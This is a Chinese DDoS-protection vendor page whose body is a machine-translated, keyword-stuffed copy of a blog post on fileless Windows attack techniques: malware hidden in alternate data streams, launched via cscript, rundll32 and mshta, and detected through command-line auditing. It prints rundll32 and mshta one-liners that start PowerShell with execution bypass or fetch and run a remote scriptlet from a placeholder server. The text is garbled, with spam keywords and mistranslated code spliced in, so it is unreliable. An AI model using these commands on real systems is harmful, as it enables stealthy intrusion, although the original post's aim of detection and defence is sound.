香港网站防DDoS高防-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!

QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > 香港网站防DDoS高防

香港网站防DDoS高防

小墨安全管家 2021-01-14 11:38 CC防护 89 ℃
DDoS防御

香港网站高防_如何防_360云防护平台

本文是"与微软一起日子"系列文章的一部分。看看剩下的:掌握无文件恶意软件渗透测试!躲藏在Windows System32文件夹中的恶意软件:regsvr32简介躲藏在Windows System32文件夹中的恶意软件:Mshta,HTA,和勒索软件躲藏在Windows System32文件夹中的恶意软件:Certutil和Alternate Data Streams躲藏在Windows System32文件夹中的恶意软件:更多备用数据流和Rundll32躲藏在Windows System32文件夹中的恶意软件:更多Rundll32和LoL安全谨防提示上一次,我们看到了黑客怎么鬼鬼祟祟地将恶意软件复制到与Windows文件相关联的备用数据流(ADS)中。我展示了怎么用古代的字体命令来实现这一点。事实证明,还有一些其他的Windows有用程序也能够让你复制到广告中。例如,extract、expand和我们的老朋友certutil都可以执行那个广告技巧。要获得这些隐秘文件复制二进制文件的完整列表,请查看Oddvar Moe的最新要点。.cta块{顶部边缘:45像素;底边:45px;衬垫顶部:45px;垫底:45px;左填充:48px;右填充:48px;背景色:F7F8FC;颜色:#fff;文本对齐:居中;}.cta块h3{文本对齐:居中;颜色:212234}.hubspot表单容器{填料:20px;右边距:自动;左边距:自动;}.cta证明{字号:20px;字体:歪体;颜色:b}猎取免费笔测试活动名目环境电子书window['Bizible']=window['Bizible']| |{_队列:[],Push:function(o,DDoS防御,p){this_队列.推送({type:o,data:p});};hbspt.forms.create({portalId:"142972",格式:"40a8f297-80c2-4c34-9572-8648458abed5",sfdcCampaignId:"70158000000台",onFormSubmit:函数($form){怪怪的。推("用户"{电子邮件:$窗体.寻找('[name=email]').val()});}});"这的确让我看到了广告安全性,这是谨防性工作从未做到的。"在我的测试中,我使用extract将一具邪恶的Javascript恶意软件复制到.doc文件的广告中。在旧的命令shell中,dir/r显示每个文件的广告。预备,预备,发射这就引出了对于Windows有用程序的一具更重要的咨询题:它们能够执行多种功能,其中有点功能不如其他功能这么出名。其实,Oddvar列出的上述有用程序都可以正常复制文件以及ADS变体。这本身并不是一具启发。可是,这真的意味着,试图检测(比如,异常文件拷贝或传输)的安全监控软件不能仅仅依赖在命令行中搜索Windows事件日志中的"副本"。日子在陆地上(LoL)是所有的欺骗和使国防更难理解他们的it系统甚至受到攻击。这就引出了IOS博客最爱慕的一具话题:没有底层文件系统结构可见性的安全软件特别容易被黑客欺骗。哦,等等,不过碰巧有一具解决方案,在文件系统罩下,于是不大概被这些LoL技术所答应。让我们回到广告中邪恶恶意软件的实际执行事情。有几种想法能够做到这一点。你能够嵌入JavaScript,就像我上次做的那么,接着使用运行足本引擎的基于Windows的应用wscript来执行广告。关于kicks,我尝试了cscript,它是命令行版本,您能够查看我在黑客会话中创建的GIF:当你看到那个GIF显示从ADS启动的JavaScript恶意软件时,你会感到困倦。你能嵌入一具HTA文件并用mshta启动恶意软件吗?确信的。PowerShell也特别好用。Oddvar Moe还有一篇特别好的帖子,列举了从广告中启动可执行文件的不同想法。再次谢谢Oddvar!返回事件日志我承认我有些不愿意在我的虚拟盒环境中启用更细粒度的事件审计——它基本是一具缓慢的情况了。我随机应变,DDoS防御,启用了命令行审计设置,能够在GPO操纵台的\Computer Configuration\Administrative Templates\System\Audit Process Creation下找到它。如今,我将可以看到启动的每个进程的命令行参数。在之前启用了PowerShell命令日志记录之后,我将面临记录财宝的尴尬。值得称道的是,Windows记录了很详细的信息—例如,我在启动前面提到的邪恶JavaScript时引用的广告:抓住你了!经过命令行审计,所有人都能够在日志中看到躲藏在广告中的JavaScript引用。还有一具日志条目显示了实际的PowerShell代码(由JavaScript启动)-在我的场景中,它下拉一具远程PowerShell足本,CC防御,接着执行它:Hmmm,下载并执行远程足本的PowerShell会话。想懂它是否与ADS文件中的JavaScript连接?即使日志中包含了所有这些额外的信息,这仍然不就是一项简单的任务—固然,有一些工具能够关心—将这两个独立的事件(cscript和PowerShell会话)关联起来,接着确定是否发生了异常活动。还有一件事:Rundll32和命令行JavasScript假如出于性能缘由而不启用Windows细粒度命令行跟踪和PowerShell审核,这么当面临黑客使用的无恶意软件技术时,数据安全监视和事件检测几乎变得不会,黑客在他们的虚拟袖子里有更多的伎俩,使IT安全组织的日子变得艰难。一些答应本地足本文件或远程URL引用的Lol软件(例如mshta)也允许将原始JavaScript(或VBScript)传递到命令行中!我之前没有提到rundll32,然而它是一具LoL二进制文件,它具有这种直截了当JavaScript功能。下面使用rundll32的足本就像广告中讲的那么-启动一具PowerShell会话,防DDoS,接着写一具小的"Boo"消息。在实际的黑客攻击中,那个消息将被替换为攻击的第一步。rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";新建%20ActiveXObject("WScript.Shell""。运行("powershell-nop-exec bypass-c write host BooHaaa!");rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";新建%20ActiveXObject("WScript.Shell""。运行("powershell-nop-exec bypass-c write host BooHaaa!");rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";新建%20ActiveXObject("WScript.Shell""。运行("powershell-nop-exec bypass-c write host BooHaaa!");在禁用了粒度审核的服务器上搜索原始Windows日志的Infosec分析师特别难确定rundll32进程事件与后续PowerShell事件之间的连接。除非他们读过这篇文章!还有更多。还记得scriplets,那些能够被当作COM对象处理的JavaScript片段吗?于是…那个地点有一具特别好的一行程序,它使用GetObject拉入一具远程scriptlet,接着在本地执行它。只需要一点JavaScript(或VBScript)就能够调用GetObject想法。rundll32和mshta都能够直截了当答应足本。使用VBScript调用GetObject的mshta版本如下:姆什塔vbscript:关闭(执行("GetObject(")足本:http://您的服务器/情况.sct"""))mshtavbscript:关闭(执行("GetObject(")足本:http://您的服务器/情况.sct"""))mshtavbscript:关闭(执行("GetObject(")足本:http://您的服务器/情况.sct"")"))巴斯塔!我想我们在这篇文章中基本说得够多了。最终,我将介绍不同的方式,黑客能够造成痛苦,一具四面楚歌的IT安全集团。假如您想在下一次之前寻觅作业,您能够思量最终两个足本,并研究这篇堆栈溢出文章,解释rundll32是怎么发挥其魔力的。我们再看一看rundll32,我会讨论一些防止黑客伏都教的想法。


DDoS防御

当前位置:主页 > CC防护 > 香港网站防DDoS高防

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119